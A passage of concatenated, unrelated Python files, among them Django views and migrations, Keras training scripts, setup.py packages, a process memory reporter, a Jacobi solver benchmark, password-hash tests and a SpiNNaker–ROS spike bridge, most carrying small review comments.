    Fixes: the bare `except:` is narrowed to IndexError (the only expected
    failure of `df_tmp.iloc[0]` on an empty frame); the unused `districts`
    list and debug prints are removed.
    """
    predict = ''
    if request.method == 'POST':
        form = PredictForm(request.POST)
        if form.is_valid():
            # Start with every model column zeroed, then one-hot encode the
            # categorical fields and copy the numeric/boolean ones.
            model_columns = joblib.load('predict/model_columns.pkl')
            data = {column: 0 for column in model_columns}
            f = form.cleaned_data
            for key, value in f.items():
                if key in ('district', 'repair_type', 'home_type'):
                    data['{}_{}'.format(key, value)] = 1
                elif isinstance(value, bool):
                    data[key] = int(value)
                else:
                    data[key] = value
            predict_price = int(requests.post('http://127.0.0.1:12345/predict',
                                              json=[data]).json()['prediction'][0])
            # Find a comparable real listing: same rooms and district, within
            # 10 m2 of the requested size and 300k of the predicted price.
            df_tmp = df[df['rooms'] == f['rooms']]
            df_tmp = df_tmp[abs(df_tmp['square'] - f['square']) <= 10]
            df_tmp = df_tmp[abs(df_tmp['price'] - predict_price) <= 300000]
            df_tmp = df_tmp[df_tmp['district'] == f['district']]
            try:
                predict = df_tmp.iloc[0].to_dict().items()
            except IndexError:
                # No comparable listing matched the filters.
                predict = 'Try to choose another districts'
    return render(request, 'predict/home.html',
                  {'title': 'It works!', 'form': PredictForm(), 'predict': predict})
|
# python shallownet_animals.py --dataset ../datasets/animals/
import sys
sys.path.append("..")
from pyimagesearch.preprocessing import ImageToArrayPreprocessor
from pyimagesearch.preprocessing import SimplePreprocessor
from pyimagesearch.datasets import SimpleDatasetLoader
from pyimagesearch.nn.conv import ShallowNet
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from keras.optimizers import SGD
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import argparse
from pyimagesearch.nn.conv import MiniVGGNet
from keras.callbacks import ModelCheckpoint
import os
from pyimagesearch.nn.conv import LeNet
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True, help="path to input dataset")
ap.add_argument("-w", "--weights", required=True, help="path to weights directory")
args = vars(ap.parse_args())
# grab the list of images that we'll be describing
print("[INFO] loading images...")
imagePaths = list(paths.list_images(args["dataset"]))
# initialize the image preprocessors: resize to 32x32, then convert to a
# Keras-compatible array
sp = SimplePreprocessor(32, 32)
iap = ImageToArrayPreprocessor()
# load the dataset from disk then scale the raw pixel intensities to [0, 1]
sdl = SimpleDatasetLoader(preprocessors=[sp, iap])
(data, labels) = sdl.load(imagePaths, verbose=500)
data = data.astype("float") / 255.0
# partition the data into training and testing splits using 75% of
# the data for training and the remaining 25% for testing
(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)
# convert the labels from integers to vectors
trainY = LabelBinarizer().fit_transform(trainY)
testY = LabelBinarizer().fit_transform(testY)
# initialize the optimizer and model
print("[INFO] compiling model...")
opt = SGD(lr=0.01)
model = LeNet.build(width=32, height=32, depth=3, classes=3)
model.compile(loss="categorical_crossentropy", optimizer=opt, metrics=["accuracy"])
# construct the callback to save only the *best* model to disk
# based on the validation accuracy
# NOTE(review): "val_acc" is the Keras 1/2 metric name; newer Keras uses
# "val_accuracy" -- confirm against the installed version.
fname = os.path.sep.join([args["weights"], "weights-{epoch:03d}-{val_acc:.4f}.hdf5"])
checkpoint = ModelCheckpoint(fname, monitor="val_acc", mode="max", save_best_only=True, verbose=2)
callbacks = [checkpoint]
# train the network
print("[INFO] training network....")
H = model.fit(trainX, trainY, validation_data=(testX, testY),
              batch_size=64,
              epochs=40,
              callbacks=callbacks,
              verbose=2)
|
#!/usr/bin/env python
import os
import re
import sys
from pipe import * # http://pypi.python.org/pypi/pipe/1.3
from subprocess import Popen, PIPE
# CLI guard: -h prints usage (user-facing messages intentionally in French).
if len(sys.argv) > 1 and sys.argv[1] == '-h':
    print "stats: Calcule des status sur quelqu'un"
    print "N'a besoin que d'une partie de son nom pour le retrouver (perl regex)"
    print "Exemple: stats oa"
    sys.exit(0)
# Extract a safe username pattern from argv; defaults to matching everyone.
search = re.search('[a-zA-Z0-9*.]*', sys.argv[1] if len(sys.argv) > 1 else '.*')
if search is None or search.group(0) == '':
    print "Stats de qui ?"
    sys.exit(0)
else :
    search = search.group(0)
def wc(logfile):
    """Return the line count of logs/users/<logfile> (shells out to `wc -l`)."""
    return int(Popen(['wc', '-l', os.path.join('logs/users', logfile)],
                     stdout=PIPE).communicate()[0].split()[0])
# Map every matching user log to its line count (pipe-library syntax).
stats = os.listdir('logs/users') \
    | where(lambda user: re.search(search, user, re.IGNORECASE) is not None) \
    | select(lambda user: (user, wc(user))) \
    | as_dict
# Print the top 10 users by line count, then a grand total when several match.
if len(stats) > 0:
    stats.iteritems() \
        | sort(cmp=lambda x, y: y[1] - x[1]) \
        | select(lambda stat: "%s: %d" % (stat[0], stat[1])) \
        | take(10) \
        | concat \
        | lineout
    if len(stats) > 1:
        print 'Total: %d' % sum(stats.values())
|
# Simple descriptive statistics over numbers typed on one line.
# Fixes: redundant str() around input() removed, pointless zero
# initialisations dropped, min/max computed directly instead of sorting,
# and empty input no longer crashes with IndexError/ZeroDivisionError.
print('Simple Statistics')
numbs = input('Please enter numbers, separated by a space:\n')
my_numbs = [float(numb) for numb in numbs.split()]
if not my_numbs:
    print('No numbers were entered.')
else:
    num_count = len(my_numbs)
    sum_count = sum(my_numbs)
    avg_count = sum_count / num_count  # safe: num_count > 0 here
    max_num = max(my_numbs)            # no need to sort the whole list
    min_num = min(my_numbs)
    print(f'The number of entered numbers is: {num_count}')
    print(f'The Sum of the numbers is: {sum_count}')
    print(f'The Average is: {avg_count}')
    print(f'The Maximum number is: {max_num}')
    print(f'The Minimum number is: {min_num}')
import time
import functools
def log(text=None):
    """Decorator factory: surround the wrapped function's result with *text*.

    The wrapped call returns the string '<text> <result> <text>'.
    """
    def decorator(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            return '{} {} {}'.format(text, func(*args, **kwargs), text)
        return inner
    return decorator
def time_elapse(text=None):
    """Decorator factory: report the wrapped call's name, result and duration.

    The wrapped call returns
    'call: <name> <result> time elapse: <seconds> <text>'.
    """
    def decorator(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            started = time.time()
            value = func(*args, **kwargs)
            elapsed = time.time() - started
            return 'call: {} {} time elapse: {} {}'.format(
                func.__name__, value, elapsed, text)
        return inner
    return decorator
# Decorators apply bottom-up: time_elapse wraps the product first, then log
# wraps the timing report, so the output is '**** call: function 80 ... ****'.
@log('****')
@time_elapse('....')
def function(x, y):
    """Return the product of x and y (used to demo the two decorators)."""
    return x * y
if __name__ == '__main__':
    print(function(4, 20))
|
from setuptools import setup, find_packages
setup(
    name='Group_6_predict',
    version='0.1',
    packages=find_packages(exclude=['tests*']),
    license='MIT',
    description='This package extract tweets',
    # long_description=open('README.md').read(),
    install_requires=['numpy'],
    url='https://github.com/Toby-masuku/analysePredict.git',
    # Fixed: setuptools expects the singular `author` keyword; the previous
    # `authors=` was an unknown argument and was silently ignored, so the
    # package metadata shipped without an author.
    author='Christopher Mahlangu, Marcio Maluka, Phiwayinkosi Hlatshwayo, Toby Masuku, Tumisang Sentle',
    # maintainer='Group 6 members/authors'
    author_email='marciomaluka@ymail.com'
)
# from setuptools import setup, find_packages
# setup(
# name='Group_6_predict',
# version='0.1',
# packages=find_packages(exclude=['tests*']),
# license='MIT',
# description='This package extract tweets',
# long_description=open('README.md').read(),
# install_requires=['numpy'],
# url='https://github.com/Toby-masuku/analysePredict',
# author='marcio Maluka')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import os
def getPid(server):
    """Return the whitespace-separated PID list of *server* (via `pidof`)."""
    pid_nu = os.popen('pidof %s'%(server)).read().strip()
    return pid_nu
def getMem(nu):
    """Return the resident memory (VmRSS, in kB) of process *nu*.

    NOTE(review): if /proc/<nu>/status has no VmRSS line (e.g. a kernel
    thread), `mem_` is unbound and this raises NameError.
    """
    with open('/proc/%s/status'%(nu)) as f:
        for line in f.readlines():
            if line.startswith('VmRSS'):
                mem_ = int(line.split()[1])
                print mem_
                break
    return mem_
def getSysMem():
    """Return total system memory (MemTotal, in kB) from /proc/meminfo."""
    with open('/proc/meminfo') as f:
        for line in f:
            if line.startswith('MemTotal'):
                mem_all = int(line.split()[1])
                break
    return mem_all
def main():
    # Sum VmRSS over all PIDs of the requested server and report the share of
    # total system memory (Python 2 script; report strings are in Chinese).
    server = raw_input('please input you server : ')
    pid_nu = getPid(server)
    print pid_nu
    all_server = 0
    for nu in pid_nu.split():
        mem = getMem(nu)
        all_server += mem
    mem_sys = getSysMem()
    print all_server,mem_sys
    v =(float(all_server) / float(mem_sys)) * 100
    v = str('%.2f'%(v)) + '%'
    print v
    all_server_mem = str('%.2f'%(all_server / 1000.0)) + 'M'
    print '%s 占用内存 %s'%(server, all_server_mem)
    print '%s 占用的百分比 %s'%(server, v)
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.10.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # "Working in fastpages"
# > "Getting this site setup"
#
# - toc: false
# - branch: master
# - badges: false
# - comments: true
# - categories: [fastpages, jupyter]
# - image: "images/thumbnails/7538107210_cf213e2a7c_c.jpeg"
# - hide: false
# - search_exclude: false
# 
# ## Hello, World!
# Well that was relatively painless.
#
# Here's a site made out of (mostly) jupyter notebooks. This post is just a jupyter notebook. 😎 Thanks, [fastpages](https://github.com/fastai/fastpages)! 🚀
# ## What Was Easy
# - **Setup is a breeze**: fastpages made it really easy to setup from their repo. Using an auto-generated pull request, was able to get a new repo up and running with no trouble.
# - **Connect to existing stuff**: Connecting to GitHub Pages site [zachbogart.github.io](https://zachbogart.github.io/) was easy. Just set it as the `baseurl`.
# - **Tracking Notebooks**: Was worried that the use of jupyter notebooks to render the posts might mean that the `.ipynb` files have to be git tracked. This can be a pain cause there is a lot in each notebook, so running a notebook without changing code will still lead to git changes, which are difficult to parse without additional tools.
# - However, at least for this post, [jupytext](https://jupytext.readthedocs.io/en/latest/index.html) works like a charm!{% fn 1 %} Can work in jupyter notebooks, track python script versions of them, and have it all be rendered to a site. Super awesome. Hope it lasts...
# ## What Will Require More Understanding
#
# - **Handling Images**: For previous posts, I used images as thumbnails *and* at the start of each post. In my experimenting, was finding I had to copy the image in two places: `my_icons` in the `_notebooks` folder and in the `images` folder. Wondering if there is a cleaner way to include an image in just one place (the [docs](https://github.com/fastai/fastpages#setting-an-image-for-social-media) mention that the social media image can only be set under `images`).
# - **It's a big machine**: The repo can be pretty intimidating. There are a lot of folders that make it go and a bunch of files with "THIS FILE WAS AUTOGENERATED! DO NOT EDIT!" penciled in. Will take some getting used to, getting comfortable with the setup and knowing what parts I should touch. There are some files that I could burn myself on, so I will go slow, use oven mitts, and try not to void any warranties.
# I'll keep [the docs](https://github.com/fastai/fastpages#welcome-to-fastpages) handy.
#
# Till next time!
# + [markdown] jupyter={"source_hidden": true}
# 
# -
# #### Image Credit
# - [waving hello](https://thenounproject.com/search/?creator=4129988&q=hello&i=3169895) by Zach Bogart from the [Noun Project](https://thenounproject.com/zachbogart/)
# - [Differential Analyzer](https://www.flickr.com/photos/nasacommons/7538107210/in/photolist-cu7LDG-cu7KiW-cubwMw-cu7Lim-cu7L1S-cu7L9d-bH9Ff6-kUBmeB-cubwDj-qAj3oW-cu7MDs-2hXAdPi-2jGCtk8-2jGCtj1-fpKVja-dWrkiU-dMAhAv-23Pqy53-dMFR2m-dMFRby-dMFRko-dMAhPP-dMFRaU-wLozW8-dMFTUW-2k3Gwre-2k3GwrE-oeuB1P-2k3Y9g1-2k3GwsG-2k3Xtps-2k3CGnm-2k3TEak-2k3Gwvs-2k3CGoi-2k3CGnX-2k3Gwsg-2k3Y9fp-2k3CGn1-2k3HdRZ-2k3Gwsr-2k3GwvN-2k3GwqC-2k3Gwr4-2k3YBEu-2k3Kuuo-2k3GwvC-2k3YBDT-2k3EYKc-2k3YBEV) from "NASA on The Commons" on Flickr Commons
# - Cool Description: *Differential Analyzer built under the direction of Harold Mergler in the Instrument Research Section. The technician is preparing a data report. This equipment was located at the Lewis Flight Propulsion Laboratory, LFPL, now John H. Glenn Research Center at Lewis Field, Cleveland Ohio.*
# {{ '[Jupytext](https://github.com/mwouts/jupytext) is a super useful way to save off jupyter notebooks as other formats. I use it all the time. Pairing a notebook is easy and you can just set it and forget it. Note: If in [JupyterLab](https://jupyterlab.readthedocs.io/en/stable/), use "View > Activate Command Palette" or "Shift + Cmd + C" to "Pair..." a notebook format. Took me a while to find out how to do this! ' | fndetail: 1 }}
|
from numpy import array
from keras.models import Sequential
from keras.layers import Dense, LSTM
# data: windows of 3 consecutive values -> the following value
x = array([[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [20000, 30000, 40000], [30000, 40000, 50000], [40000, 50000, 60000], [100, 200, 300]])
y = array([4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 50000, 60000, 70000, 400])
# preprocessing
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.preprocessing import RobustScaler, MaxAbsScaler
sc = StandardScaler()  # standardization (zero mean, unit variance)
sc.fit(x)
x = sc.transform(x)
# NOTE(review): x is standardized and then min-max scaled on top of that --
# confirm both passes are intended rather than choosing one scaler.
mms = MinMaxScaler()  # normalization (rescale features into the 0-1 range)
mms.fit(x)
x = mms.transform(x)
# rs = RobustScaler()
# rs.fit(x)
# x = rs.transform(x)
# mas = MaxAbsScaler()
# mas.fit(x)
# x = mas.transform(x)
print(x)
# split into train / test sets (shuffle=False: the last rows form the test set)
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.75, random_state=66, shuffle=False)
print(x_train.shape)
# build the model: functional API, a tapering stack of Dense layers
from keras.models import Sequential, Model
from keras.layers import Dense, Input
input1 = Input(shape=(3,))
model = Dense(1024)(input1)
model = Dense(512)(model)
model = Dense(256)(model)
model = Dense(128)(model)
model = Dense(64)(model)
model = Dense(32)(model)
model = Dense(16)(model)
output1 = Dense(1)(model)
model = Model(inputs = input1, outputs = output1)
# model summary
model.summary()
model.compile(loss='mse', optimizer = 'adam', metrics = ['mae'])
# early stopping on the training loss
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor='loss', patience=1000, mode='auto')
# train the model
model.fit(x_train, y_train, epochs = 100000, batch_size=3, verbose=0, callbacks=[early_stopping])
# evaluate the model
loss, mae = model.evaluate(x_test, y_test, batch_size=3)
print('loss: ' , loss)
print('mae: ', mae)
# predict
y_predict = model.predict(x_test, batch_size=3)
# compute R2
from sklearn.metrics import r2_score
r2_y_predict = r2_score(y_test, y_predict)
print("R2: ", r2_y_predict)
import numpy as np
# NOTE(review): this probe is fed to the model unscaled, unlike the training
# data -- confirm whether it should pass through the fitted scalers first.
x_prd = np.array([[250, 260, 270]])
# x_prd = np.transpose(x_prd)
aaa = model.predict(x_prd, batch_size=1)
print(aaa)
'''
Descripttion: 小型矩阵向量化未必比naive快,但大型矩阵向量化远超naive
Version: 1.0
Author: ZhangHongYu
Date: 2021-03-08 17:26:11
LastEditors: ZhangHongYu
LastEditTime: 2021-05-30 16:30:09
'''
import numpy as np
import time
eps = 1e-6
n = 6 #迭代次数
#向量化实现
def Jocobi(A, b, n_iter=6):
    """Solve A x = b with a fixed number of Jacobi sweeps (vectorized).

    A      -- square matrix with a non-zero (ideally dominant) diagonal
    b      -- right-hand side, same length as A's rows
    n_iter -- number of sweeps; generalizes the module-level global `n`
              (which is 6) into a backward-compatible parameter

    Returns the float32 iterate after n_iter sweeps; no convergence test.
    """
    assert A.shape[0] == A.shape[1] == b.shape[0]
    x = np.zeros(b.shape, dtype=np.float32)
    d = np.diag(A)      # diagonal entries of A
    R = A - np.diag(d)  # off-diagonal remainder
    # Jacobi update: x_{k+1} = D^{-1} (b - R x_k)
    for _ in range(n_iter):
        x = (b - np.matmul(R, x)) / d
    return x
#普通实现
def Jocobi_naive(A, b, n_iter=6):
    """Triple-loop counterpart of Jocobi (for the timing comparison).

    n_iter generalizes the module-level global `n` (6) into a
    backward-compatible parameter.

    Note: x is updated in place within a sweep, so later rows already see
    this sweep's earlier results (Gauss-Seidel-style), unlike the fully
    simultaneous vectorized version.
    """
    assert A.shape[0] == A.shape[1] == b.shape[0]
    x = np.zeros(b.shape, dtype=np.float32)
    for _ in range(n_iter):
        for i in range(x.shape[0]):
            # Row i: subtract the off-diagonal contributions, divide by A[i,i].
            val = b[i]
            for j in range(A.shape[1]):
                if j != i:
                    val -= A[i, j] * x[j]
            x[i] = val / A[i][i]
    return x
if __name__ == '__main__':
    # A must be diagonally dominant for Jacobi to converge.
    # A = np.array(
    #     [
    #         [3, 1, -1],
    #         [2, 4, 1],
    #         [-1, 2, 5]
    #     ],dtype=np.float32
    # )
    A = np.eye(1000, dtype=np.float32)
    # b = np.array(
    #     [4, 1, 1],dtype=np.float32
    # )
    b = np.zeros((1000,), np.float32)
    # Time the naive triple-loop implementation...
    start1 = time.time()
    x1 = Jocobi_naive(A, b)
    end1 = time.time()
    print("time: %.10f" % (end1-start1))
    print(x1)
    # ...then the vectorized one on the same system, for comparison.
    start2 = time.time()
    x2 = Jocobi(A, b)
    end2 = time.time()
    print("time: %.10f" % (end2 - start2))
    print(x2)
    #print(A, "\n", b)
|
from ..security import passwd, passwd_check
def test_passwd_structure():
    """A fresh hash has the form 'algorithm:hash' with the argon2id marker."""
    p = passwd('passphrase')
    algorithm, hashed = p.split(':')
    assert algorithm == 'argon2'
    assert hashed.startswith('$argon2id$')
def test_roundtrip():
    """The passphrase used to create a hash verifies against it."""
    p = passwd('passphrase')
    assert passwd_check(p, 'passphrase') == True
def test_bad():
    """Wrong or malformed candidate passphrases are rejected."""
    p = passwd('passphrase')
    assert passwd_check(p, p) == False
    assert passwd_check(p, 'a:b:c:d') == False
    assert passwd_check(p, 'a:b') == False
def test_passwd_check_unicode():
    """Non-ASCII passphrases verify against stored sha1 and argon2 hashes."""
    # GH issue #4524
    phash = u'sha1:23862bc21dd3:7a415a95ae4580582e314072143d9c382c491e4f'
    assert passwd_check(phash, u"łe¶ŧ←↓→")
    phash = (u'argon2:$argon2id$v=19$m=10240,t=10,p=8$'
             u'qjjDiZUofUVVnrVYxacnbA$l5pQq1bJ8zglGT2uXP6iOg')
    assert passwd_check(phash, u"łe¶ŧ←↓→")
|
# Generated by Django 2.1.3 on 2018-12-26 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the SiteConfiguration table with per-section display toggles."""

    dependencies = [
        ('maincv', '0014_testimonial_image'),
    ]
    operations = [
        migrations.CreateModel(
            name='SiteConfiguration',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Each flag controls whether the matching CV section is shown.
                ('show_education', models.BooleanField(default=True)),
                ('show_experiences', models.BooleanField(default=True)),
                ('show_testimonials', models.BooleanField(default=True)),
            ],
        ),
    ]
|
def get_max_divis(in_list):
    """Return the quotient of the first divisible pair, scanning in sorted order.

    The values are considered ascending; for the smallest value that evenly
    divides some larger value, the quotient larger/divisor is returned as an
    int.  Returns 0 when no value divides another.

    Fix: the caller's list is no longer sorted in place (the original mutated
    its argument via list.sort()).
    """
    ordered = sorted(in_list)
    for pos, divisor in enumerate(ordered):
        for larger in ordered[pos + 1:]:
            if larger % divisor == 0:
                return int(larger / divisor)
    return 0
def get_sum_chart(in_chart):
    """Return the sum of get_max_divis over every row of *in_chart*."""
    return sum(get_max_divis(row) for row in in_chart)
if __name__ == '__main__':
    # Read the row count, then one whitespace-separated row per line.
    num_rows = int(input())
    chart = [[int(x) for x in input().split()] for _ in range(num_rows)]
    # Renamed from `sum`, which shadowed the builtin used by get_sum_chart.
    total = get_sum_chart(chart)
    print(total)
import zlib
def compress(s):
    '''
    This function takes a string and converts it into a Python-compatible
    string to be used in a print statement. This may come handy for
    very long strings with many repetitions.
    Example:
    converts
    "aaaa bbbb ccc\n"
    to
    "a"*4 + " "*4 + "b"*4 +" " + "c"*3 + "\n"
    Arguments:
    s a string
    Returns:
    a string in the ([any substring*] * n...) to be used with a print statement
    in a Python script.

    NOTE(review): assumes the input ends with a newline (the last character is
    dropped and '\\n' is appended unconditionally at the end).
    '''
    s = list(s)
    c = dict()
    out = 'print("'
    while s:
        # with this check I assume that the last char of each of these strings
        # is a \n, so I will add it once out of the loop
        if len(s) == 1:
            break
        i = 0
        #if single character, pushes it straight in the array (adds an extra
        # '\' in case of a special character / backlash)
        if s[i] != s[i+1]:
            if s[i] == '\n':
                s[i] = '\\n'
            out = out + s[i] +'"+"'
        # if multiple chars in a row, then counts the instances with a
        # dictionary count, an pushes string with multiplication of number
        # of instances (TODO: fix the ugly +1 workaround)
        else:
            while s[i] == s[i+1]:
                if s[i] in c:
                    c[s[i]] +=1
                else:
                    c[s[i]] = 1
                i += 1
            # TODO: the one below is the ugly +1 workaround - it does not
            # count the last instance(because the next char is different)
            out = out + s[i] + '"*' + str(c[s[i]] + 1) + '+"'
            i = c[s[i]] # i becomes the number of instances of the char (it
            # stays one if it's only one instance)
            # NOTE(review): after the rebinding above, s[i] may index a
            # different character than the one just counted, so this reset may
            # zero the wrong counter -- confirm against a repeated-run input.
            c[s[i]] = 0
        del s[0:i + 1] #again, the ugly +1 workaround
    # NOT REALLY NEEDED, so I commented it out;
    #compress with zlib
    #comp = zlib.compress((out + '\\n")').encode("ascii") ) TODO
    #print(comp)
    return out + '\\n")'
|
from os.path import join, dirname
from nmigen import Fragment, Signal
from cores.jtag.jtag_peripheral_connector import JTAGPeripheralConnector
from soc.peripherals_aggregator import PeripheralsAggregator
from soc.memorymap import Address
from soc.soc_platform import SocPlatform
class JTAGSocPlatform(SocPlatform):
    """SoC platform variant that exposes all peripherals over a JTAG bridge."""

    # Whole 32-bit address space, byte-addressed (bit_len is in bits).
    base_address = Address(address=0x0000_0000, bit_offset=0, bit_len=0xFFFF_FFFF * 8)
    # Python driver source shipped alongside the bitstream.
    # NOTE(review): the file handle opened here is never closed explicitly.
    pydriver_memory_accessor = open(join(dirname(__file__), "memory_accessor_openocd.py")).read()
    def __init__(self, platform):
        super().__init__(platform)
        self.jtag_signals = Signal(11)
        def peripherals_connect_hook(platform, top_fragment: Fragment, sames):
            # Fan all registered peripherals into one aggregator that sits
            # behind a single JTAG connector fragment.
            if platform.peripherals:
                aggregator = PeripheralsAggregator()
                for peripheral in platform.peripherals:
                    aggregator.add_peripheral(peripheral)
                jtag_controller = JTAGPeripheralConnector(aggregator)
                platform.to_inject_subfragments.append((jtag_controller, "jtag_controller"))
        self.prepare_hooks.append(peripherals_connect_hook)
    def pack_bitstream_fatbitstream(self, builder):
        # Bundle the SVF bitstream plus the openocd command that plays it.
        builder.append_self_extracting_blob_from_file("{{name}}.svf", "bitstream_jtag.svf")
        builder.append_command("openocd -f openocd.cfg -c 'svf -tap dut.tap -quiet bitstream_jtag.svf; shutdown'\n")
|
# imports of both spynnaker and external device plugin.
import spynnaker.pyNN as Frontend
import spynnaker_external_devices_plugin.pyNN as ExternalDevices
#######################
# import to allow prefix type for the prefix eieio protocol
######################
from spynnaker_external_devices_plugin.pyNN.connections\
.spynnaker_live_spikes_connection import SpynnakerLiveSpikesConnection
# plotter in python
import pylab
import time
import random
import threading
import time
import rospy
from std_msgs.msg import Int8
# ROS publisher: neuron ids of spikes leaving the SpiNNaker 'pop' population.
pub = rospy.Publisher('/output_spikes', Int8, queue_size = 10)
def spike_received_ros_callback(msg):
    """ROS subscriber callback: inject a received spike id into SpiNNaker.

    NOTE(review): relies on the module-level ``live_spikes_connection_send``
    existing before the first message arrives -- confirm startup ordering.
    """
    id = msg.data  # NOTE: shadows the builtin ``id``
    print "Received spike from external device: " + str(id)
    live_spikes_connection_send.send_spike("spike_injector",id)
# ROS subscriber: ids published on /input_spikes are forwarded to the injector.
subscriber = rospy.Subscriber('/input_spikes', Int8, spike_received_ros_callback)
# Create an initialisation method
def init_pop(label, n_neurons, run_time_ms, machine_timestep_ms):
    """Init callback: log population size and simulation timing at startup."""
    print "{} has {} neurons".format(label, n_neurons)
    print "Simulation will run for {}ms at {}ms timesteps".format(
        run_time_ms, machine_timestep_ms)
# Create a receiver of live spikes
def receive_spikes(label, time, neuron_ids):
    """Live-spike callback: publish each spiking neuron id to ROS.

    NOTE: the ``time`` parameter shadows the imported ``time`` module.
    """
    global pub
    for neuron_id in neuron_ids:
        pub.publish(neuron_id)
# initial call to set up the front end (pynn requirement)
Frontend.setup(timestep=1.0, min_delay=1.0, max_delay=144.0)
# neurons per population and the length of runtime in ms for the simulation,
# as well as the expected weight each spike will contain
n_neurons = 100
run_time = 800000
weight_to_spike = 2.0
# neural parameters of the ifcur model used to respond to injected spikes.
# (cell params for a synfire chain)
cell_params_lif = {'cm': 0.25,
                   'i_offset': 0.0,
                   'tau_m': 20.0,
                   'tau_refrac': 2.0,
                   'tau_syn_E': 5.0,
                   'tau_syn_I': 5.0,
                   'v_reset': -70.0,
                   'v_rest': -65.0,
                   'v_thresh': -50.0
                   }
##################################
# Parameters for the injector population. This is the minimal set of
# parameters required, which is for a set of spikes where the key is not
# important. Note that a virtual key *will* be assigned to the population,
# and that spikes sent which do not match this virtual key will be dropped;
# however, if spikes are sent using 16-bit keys, they will automatically be
# made to match the virtual key. The virtual key assigned can be obtained
# from the database.
##################################
cell_params_spike_injector = {
    # The port on which the spiNNaker machine should listen for packets.
    # Packets to be injected should be sent to this port on the spiNNaker
    # machine
    'port': 12345,
}
##################################
# Parameters for the injector population. Note that each injector needs to
# be given a different port. The virtual key is assigned here, rather than
# being allocated later. As with the above, spikes injected need to match
# this key, and this will be done automatically with 16-bit keys.
##################################
cell_params_spike_injector_with_key = {
    # The port on which the spiNNaker machine should listen for packets.
    # Packets to be injected should be sent to this port on the spiNNaker
    # machine
    'port': 12346,
    # This is the base key to be used for the injection, which is used to
    # allow the keys to be routed around the spiNNaker machine. This
    # assignment means that 32-bit keys must have the high-order 16-bit
    # set to 0x7; This will automatically be prepended to 16-bit keys.
    'virtual_key': 0x70000,
}
# create synfire populations (if cur exp)
pop = Frontend.Population(n_neurons, Frontend.IF_curr_exp,
                          cell_params_lif, label='pop')
# Create injection populations
injector = Frontend.Population(
    n_neurons, ExternalDevices.SpikeInjector,
    cell_params_spike_injector_with_key, label='spike_injector')
# Create a connection from the injector into the populations
Frontend.Projection(injector, pop,
                    Frontend.OneToOneConnector(weights=weight_to_spike))
# Activate the sending of live spikes
ExternalDevices.activate_live_output_for(
    pop, database_notify_host="localhost",
    database_notify_port_num=19996)
# Set up the live connection for sending spikes
live_spikes_connection_send = SpynnakerLiveSpikesConnection(
    receive_labels=None, local_port=19999,
    send_labels=["spike_injector"])
# Set up callbacks to occur at initialisation
live_spikes_connection_send.add_init_callback(
    "spike_injector", init_pop)
# NOTE: local_port 19996 matches database_notify_port_num above.
live_spikes_connection_receive = SpynnakerLiveSpikesConnection(
    receive_labels=["pop"],
    local_port=19996, send_labels=None)
# Set up callbacks to occur when spikes are received
live_spikes_connection_receive.add_receive_callback(
    "pop", receive_spikes)
def run():
    """Run the simulation for ``run_time`` ms, then shut the front end down."""
    Frontend.run(run_time)
    Frontend.end()
|
##############################################################################
#
# Copyright (c) 2009 Agendaless Consulting and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the BSD-like license at
# http://www.repoze.org/LICENSE.txt. A copy of the license should accompany
# this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL
# EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND
# FITNESS FOR A PARTICULAR PURPOSE
#
##############################################################################
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))

def _read(filename):
    """Return the text of *filename* relative to setup.py, closing the
    handle promptly (the original bare ``open().read()`` leaked it)."""
    with open(os.path.join(here, filename)) as f:
        return f.read()

README = _read('README.txt')
CHANGES = _read('CHANGES.txt')
requires = [
'pyramid',
'repoze.tm2',
'repoze.monty',
'repoze.who',
'repoze.whoplugins.zodb',
'repoze.retry',
'ZODB3',
'Pygments',
'FormEncode',
'nose',
'repoze.zodbconn',
'repoze.folder',
'PyCAPTCHA',
'Pillow',
'repoze.session',
'repoze.browserid',
'repoze.catalog',
'repoze.lemonade',
'virtualenv',
'Sphinx',
'repoze.sphinx.autointerface',
'repoze.sendmail',
'docutils',
]
setup(name='marlton',
version='0.0',
description=('A web site for Pyramid with a paste bin and a tutorial '
'bin'),
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Internet :: WWW/HTTP :: WSGI",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
keywords='paste bin tutorial pyramid wsgi website',
author="Carlos de la Guardia, Chris McDonough",
author_email="cguardia@yahoo.com",
url="http://www.delaguardia.com.mx",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
packages=find_packages(),
dependency_links = [
'http://dist.repoze.org/bfgsite/PyCAPTCHA-0.4repoze2.tar.gz'],
include_package_data=True,
zip_safe=False,
tests_require = requires,
install_requires= requires,
test_suite="nose.collector",
entry_points = """\
[paste.app_factory]
main = marlton:main
[console_scripts]
